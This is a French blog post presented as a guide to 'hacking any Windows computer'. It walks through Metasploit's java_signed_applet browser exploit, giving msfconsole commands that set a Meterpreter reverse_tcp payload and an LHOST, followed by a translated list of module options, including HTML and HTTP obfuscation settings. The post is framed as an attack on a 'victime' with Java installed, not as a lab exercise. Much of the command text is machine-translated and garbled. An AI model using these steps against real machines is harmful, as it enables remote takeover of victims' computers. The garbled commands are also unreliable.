Comment pirater n'importe quel ordinateur Windows XP/Vista/7/8 utilisant Metasploit [REMOTE]

Comment pirater n'importe quel ordinateur Windows XP/Vista/7/8 utilisant Metasploit [REMOTE]



Je vais vous montrer comment pirater une machine Windows utilisant exploit de Metasploit.Si vous utilisez MS Windows, vous devez installer Metasploit, si vous utilisez BackTrack ou Kali Linux, il est deja installé [VICTIME devez avoir installé JAVA].
Cet exploit crée dynamiquement un fichier. Jar via le Msf :: Exploit :: Java mixin, puis il signe l'.L'applet signée en résulte est présenté à la victime via une page web avec une balise d'applet.JVM de la victime apparaît une boîte de dialogue demandant si ils ont confiance l'applet signée. Sur les anciennes versions de la boîte de dialogue affiche la valeur de CERTCN dans la ligne "Editeur". Newer affichage JVM "UNKNOWN" si la signature n'est pas fiable (c'est à dire qu'il n'est pas signé par une autorité de certification). L'option SigningCert vous permet de fournir un code de confiance signature cert, les valeurs qui remplaceront CERTCN. Si SigningCert n'est pas donné, un certificat auto-signé généré aléatoirement sera utilisé. De toute façon, une fois que l'utilisateur clique sur "run", l'applet s'exécute avec toutes les permissions de l'utilisateur.
Donc, nous allons commencer.
D'abord, lancez la console Metasploit en tapant msfconsole dans l'aérogare.
msf>  utilisation exploit / multi / browser / java_signed_applet
msf exploit (java_signed_applet)>  show payloads
msf exploit (java_signed_applet)>  set PAYLOAD java / Meterpreter / reverse_tcp
msf exploit (java_signed_applet)>  mettre LHOST [MON ADRESSE IP]
msf exploit (java_signed_applet)>  exploiter
LHOST est votre adresse IP, vous pouvez vérifier en tapant "ifconfig" dans le terminal.

Exploit Options du module

APPLETNAMELe nom de la classe de l'applet principale. (Par défaut: SiteLoader)
CERTCNLe CN = valeur pour le certificat. Ne peut pas contenir ',' ou '/' (par défaut: SiteLoader)
SRVHOSTL'hôte local à écouter. Ce doit être une adresse sur la machine locale ou 0.0.0.0 (par défaut: 0.0.0.0)
SRVPORTLe port local à écouter. (Par défaut: 8080)
SSLNégocier SSL pour les connexions entrantes
SslcertChemin d'un certificat SSL personnalisé (par défaut est généré aléatoirement)
SSLVersionSpécifiez la version de SSL qui doit être utilisé (accepté: SSL2, SSL3, TLS1) (par défaut: SSL3)
SigningCertChemin d'un certificat de signature en PEM ou PKCS12 (. Pfx) Format
SigningKeyChemin vers une clé de signature au format PEM
SigningKeyPassMot de passe pour la clé de signature (obligatoire si SigningCert est un. Pfx)
URIPATHL'URI à utiliser pour cet exploit (le défaut est aléatoire)
ContextInformationFileLe fichier d'informations qui contient des informations de contexte
DisablePayloadHandlerDésactiver le code du gestionnaire de la charge utile sélectionnée
EXE :: PersonnaliséUtilisez exe personnalisée au lieu de générer automatiquement un exe charge
EXE :: FallBackUtilisez le modèle par défaut dans le cas de celui spécifié est manquant
EXE :: InjecterSet de préserver la fonction EXE originale
EXE :: OldMethodPermet d'utiliser la méthode de génération de EXE de substitution.
EXE :: CheminLe répertoire dans lequel rechercher le modèle exécutable
EXE :: TemplateLe nom du fichier de modèle exécutable.
EnableContextEncodingUtilisez contexte transitoire lors de l'encodage des charges utiles
ListenerCommLe canal de communication spécifique à utiliser pour ce service,
VERBOSEActiver les messages d'état détaillés
ESPACE DE TRAVAILSpécifiez l'espace de travail pour ce module
HTML :: base64Activer obscurcissement HTML via un embeded base64 objet HTML (IE pas pris en charge) (accepté: aucun, plaine, single_pad, double_pad, random_space_injection)
HTML :: javascript :: échapperActiver obscurcissement HTML via HTML s'échapper (nombre d'itérations)
HTML :: unicodeActiver obfuscation HTTP via unicode (accepté: aucun, UTF-16LE, UTF-16BE, UTF-16BE-marqueur, UTF-32LE, UTF-32BE)
HTTP :: chunkedActiver arrachement des réponses HTTP via "Transfer-Encoding: chunked"
Compression HTTP ::Activer la compression des réponses HTTP via le codage de contenu (accepté: aucun, gzip, deflate)
HTTP :: header_foldingActiver le pliage des en-têtes HTTP
HTTP :: junk_headersPermettre l'insertion de hasard indésirables en-têtes HTTP
HTTP :: nom_serveurConfigure l'en-tête du serveur de toutes les réponses sortantes
TCP :: max_send_sizeMaximum tcp taille de segment. (0 = désactiver)
TCP :: send_delayLes retards insérés avant chaque envoi. (0 = désactiver)

 
Geeks Blog © 2012 | Designed by Cheap TVS, in collaboration with Vegan Breakfast, Royalty Free Images and Live Cricket Score